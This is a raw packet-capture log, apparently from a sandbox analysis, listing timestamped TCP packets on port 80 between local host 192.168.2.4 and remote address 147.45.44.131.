Sep 26, 2024 21:06:05.973917961 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973948956 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973980904 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974008083 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974085093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974117041 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974140882 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974183083 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974215031 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974231958 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974246025 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974277020 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974297047 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974308968 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974340916 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974364042 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974373102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974425077 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974735022 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974766970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974798918 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974814892 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974832058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974864006 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974886894 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974899054 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974931002 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974950075 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.974961996 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.974996090 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975011110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975271940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975305080 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975336075 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975353003 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975367069 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975415945 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975446939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975469112 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975469112 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975481033 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975513935 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975537062 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975548029 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975579977 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975594044 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975613117 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.975663900 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.975976944 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976007938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976038933 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976056099 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976070881 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976103067 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976118088 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976135969 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976166964 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976182938 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976198912 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976229906 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976246119 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976262093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976293087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976310015 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976324081 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976356030 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976372957 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976387024 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976418018 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976449013 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976828098 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976860046 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976878881 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976911068 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976943016 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.976959944 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.976974964 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977006912 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977026939 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977037907 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977071047 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977101088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977103949 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977132082 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977154970 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977164984 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977196932 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977216959 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977229118 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977261066 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977282047 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977298975 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977329969 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977358103 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977360010 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977415085 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977808952 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977840900 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977890015 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977890968 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977921963 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977952957 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.977968931 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.977986097 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978017092 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978034019 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978048086 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978080034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978099108 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978112936 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978143930 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978161097 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978176117 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978207111 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978224039 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978239059 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978269100 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978286028 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978302956 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978349924 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978786945 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978818893 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978859901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978864908 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.978893042 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978924990 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.978941917 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.996496916 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996525049 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996557951 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996685982 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996687889 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.996687889 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.996717930 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996751070 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996761084 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.996798992 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996831894 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996861935 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996864080 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.996895075 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996906042 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.996927023 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996973038 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.996989965 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.997009993 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.997042894 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.997050047 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.997076988 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.997126102 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.065498114 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065531015 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065562963 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065606117 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.065613031 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065644026 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065677881 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.065691948 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065725088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065756083 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.065789938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065820932 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065848112 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.065853119 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065886974 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065898895 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.065922022 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065957069 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.065969944 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066102982 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066134930 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066154003 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066167116 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066210032 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066216946 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066243887 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066276073 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066293955 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066307068 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066340923 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066355944 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066498995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066530943 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066545963 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066565037 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066611052 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066622972 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066644907 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066675901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066696882 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066708088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066740990 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066761971 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066772938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066817999 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.066924095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066952944 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066982985 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.066998005 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067017078 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067063093 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067265987 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067302942 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067332983 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067351103 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067364931 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067414045 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067445040 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067450047 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067476988 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067500114 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067517042 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067549944 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067567110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067580938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067612886 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067631960 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067641020 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067672014 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067687035 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.067703962 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067739964 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.067750931 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068046093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068093061 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068095922 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068124056 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068155050 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068186045 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068212986 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068217039 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068237066 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068248987 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068279982 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068310022 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068310976 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068342924 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068358898 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068376064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068407059 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068433046 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068440914 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068471909 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068490028 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068504095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068535089 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068559885 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.068567991 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.068609953 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069017887 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069066048 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069096088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069119930 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069128990 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069160938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069179058 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069191933 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069226980 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069246054 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069257975 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069287062 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069314957 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069318056 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069350004 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069380045 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069381952 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069413900 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069438934 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069444895 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069477081 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069508076 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069509029 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069539070 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069552898 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069571972 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.069617987 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.069957972 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070004940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070031881 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070053101 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070064068 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070100069 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070116997 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070131063 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070162058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070187092 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070194006 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070225000 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070245981 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070255995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070286989 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070302963 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070319891 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070350885 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070368052 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070383072 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070415020 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070431948 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070445061 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070477962 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070496082 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.070796013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070827961 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.070842981 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089202881 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089272976 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089283943 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089308023 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089342117 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089358091 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089394093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089426041 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089445114 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089461088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089493036 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089508057 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089524984 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089556932 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089576960 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089590073 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089641094 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.089644909 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089679003 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089714050 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.089725018 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.131618977 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158282042 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158329964 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158385038 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158417940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158452034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158483028 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158520937 CEST	49730	80	192.168.2.4	147.45.44.131
